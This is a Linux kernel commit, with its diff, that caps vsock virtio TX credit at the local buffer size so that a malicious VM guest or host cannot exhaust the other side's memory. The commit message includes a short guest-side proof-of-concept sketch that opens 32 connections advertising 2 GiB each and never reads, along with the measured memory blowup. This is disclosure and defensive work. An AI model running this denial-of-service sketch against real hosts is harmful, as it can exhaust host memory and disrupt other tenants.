
vsock/virtio: cap TX credit to local buffer size

The virtio transports derive their TX credit directly from peer_buf_alloc,
which is set from the remote endpoint's SO_VM_SOCKETS_BUFFER_SIZE value.

On the host side this means that the amount of data we are willing to
queue for a connection is scaled by a guest-chosen buffer size, rather
than the host's own vsock configuration. A malicious guest can advertise
a large buffer and read slowly, causing the host to allocate a
correspondingly large amount of sk_buff memory.
The same thing would happen in the guest with a malicious host, since
virtio transports share the same code base.

Introduce a small helper, virtio_transport_tx_buf_size(), that
returns min(peer_buf_alloc, buf_alloc), and use it wherever we consume
peer_buf_alloc.
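
For illustration, with hypothetical values (a peer advertising 2 GiB while
the local buf_alloc is 256 KiB), the effective window collapses to the
local limit; the standalone userspace snippet below just mirrors that
min() arithmetic, it is not kernel code:

#include <stdio.h>

/* Toy illustration of the capped credit computation; the 2 GiB and
 * 256 KiB figures are hypothetical example values, not kernel defaults.
 */
int main(void)
{
        unsigned int peer_buf_alloc = 2U << 30;   /* advertised by the peer */
        unsigned int buf_alloc = 256 * 1024;      /* local buffer size */
        unsigned int win = peer_buf_alloc < buf_alloc ?
                           peer_buf_alloc : buf_alloc;

        printf("effective TX window: %u bytes\n", win);   /* prints 262144 */
        return 0;
}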

This ensures the effective TX window is bounded by both the peer's
advertised buffer and our own buf_alloc (already clamped to
buffer_max_size via SO_VM_SOCKETS_BUFFER_MAX_SIZE), so a remote peer
cannot force the local endpoint to queue more data than its own
vsock settings allow.
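
For reference, those local knobs are the standard AF_VSOCK socket options;
a minimal userspace sketch follows (the 256 KiB figure and the helper name
are only illustrative, not part of this patch):

#include <sys/socket.h>
#include <linux/vm_sockets.h>

/* Sketch: pin the local buffer policy for a vsock socket. buffer_max_size
 * caps any later SO_VM_SOCKETS_BUFFER_SIZE request, and with this patch
 * the resulting buf_alloc also bounds how much this endpoint will queue
 * on its own TX path, whatever credit the peer advertises.
 */
int vsock_set_local_buffer_policy(int fd)
{
        unsigned long long max = 256 * 1024;    /* illustrative 256 KiB cap */
        unsigned long long size = 256 * 1024;

        if (setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
                       &max, sizeof(max)))
                return -1;
        /* Requests above buffer_max_size are clamped down to it. */
        return setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
                          &size, sizeof(size));
}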

On an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with
32 guest vsock connections advertising 2 GiB each and reading slowly
drove Slab/SUnreclaim from ~0.5 GiB to ~57 GiB; the system only
recovered after killing the QEMU process. That said, if QEMU's memory is
limited with cgroups, the memory consumption is bounded by the cgroup limit.
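
The PoC itself is not part of this patch, but a guest-side sketch along
those lines could look roughly like the following; the host port and the
assumption that a host service keeps writing into each connection are
made up for illustration:

#include <unistd.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>

#define NR_CONNS        32
#define HOST_PORT       1234    /* hypothetical host service that streams data */

int main(void)
{
        struct sockaddr_vm addr = {
                .svm_family = AF_VSOCK,
                .svm_cid = VMADDR_CID_HOST,
                .svm_port = HOST_PORT,
        };
        unsigned long long size = 2ULL << 30;   /* advertise 2 GiB per connection */
        int i, fd;

        for (i = 0; i < NR_CONNS; i++) {
                fd = socket(AF_VSOCK, SOCK_STREAM, 0);
                if (fd < 0)
                        return 1;
                /* Raise the local cap, then advertise the huge buffer. */
                setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
                           &size, sizeof(size));
                setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
                           &size, sizeof(size));
                if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)))
                        return 1;
                /* Never read: pre-patch, the host keeps queueing sk_buffs
                 * against the 2 GiB credit it was granted.
                 */
        }
        pause();        /* keep all connections open, reading nothing */
        return 0;
}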

With this patch applied, running the same PoC:

Before:
MemFree: ~61.6 GiB
Slab: ~142 MiB
SUnreclaim: ~117 MiB

After 32 high-credit connections:
MemFree: ~61.5 GiB
Slab: ~178 MiB
SUnreclaim: ~152 MiB

Only a ~35 MiB increase in Slab/SUnreclaim, no host OOM, and the guest
remains responsive.

Compatibility with non-virtio transports:

- VMCI uses the AF_VSOCK buffer knobs to size its queue pairs per
socket based on the local vsk->buffer_* values; the remote side
cannot enlarge those queues beyond what the local endpoint
configured.

- Hyper-V's vsock transport uses fixed-size VMBus ring buffers and
an MTU bound; there is no peer-controlled credit field comparable
to peer_buf_alloc, and the remote endpoint cannot drive in-flight
kernel memory above those ring sizes.

- The loopback path reuses virtio_transport_common.c, so it
naturally follows the same semantics as the virtio transport.

This change is limited to virtio_transport_common.c and thus affects
virtio-vsock, vhost-vsock, and loopback, bringing them in line with the
"remote window intersected with local policy" behaviour that VMCI and
Hyper-V already effectively have.

Fixes: 06a8fc78367d ("VSOCK: Introduce virtio_vsock_common.ko")
Suggested-by: Stefano Garzarella <sgarzare@redhat.com>
Signed-off-by: Melbin K Mathew <mlbnkm1@gmail.com>
[Stefano: small adjustments after changing the previous patch]
[Stefano: tweak the commit message]
Signed-off-by: Stefano Garzarella <sgarzare@redhat.com>
Reviewed-by: Luigi Leonardi <leonardi@redhat.com>
Link: https://patch.msgid.link/20260121093628.9941-4-sgarzare@redhat.com
Acked-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>

 net/vmw_vsock/virtio_transport_common.c | 14 ++++++++++++--
 1 file changed, 12 insertions(+), 2 deletions(-)
···
 }
 EXPORT_SYMBOL_GPL(virtio_transport_seqpacket_dequeue);
 
+static u32 virtio_transport_tx_buf_size(struct virtio_vsock_sock *vvs)
+{
+        /* The peer advertises its receive buffer via peer_buf_alloc, but we
+         * cap it to our local buf_alloc so a remote peer cannot force us to
+         * queue more data than our own buffer configuration allows.
+         */
+        return min(vvs->peer_buf_alloc, vvs->buf_alloc);
+}
+
 int
 virtio_transport_seqpacket_enqueue(struct vsock_sock *vsk,
                                    struct msghdr *msg,
···
 
         spin_lock_bh(&vvs->tx_lock);
 
-        if (len > vvs->peer_buf_alloc) {
+        if (len > virtio_transport_tx_buf_size(vvs)) {
                 spin_unlock_bh(&vvs->tx_lock);
                 return -EMSGSIZE;
         }
···
          * we have bytes in flight (tx_cnt - peer_fwd_cnt), the subtraction
          * does not underflow.
          */
-        bytes = (s64)vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
+        bytes = (s64)virtio_transport_tx_buf_size(vvs) -
+                (vvs->tx_cnt - vvs->peer_fwd_cnt);
         if (bytes < 0)
                 bytes = 0;
 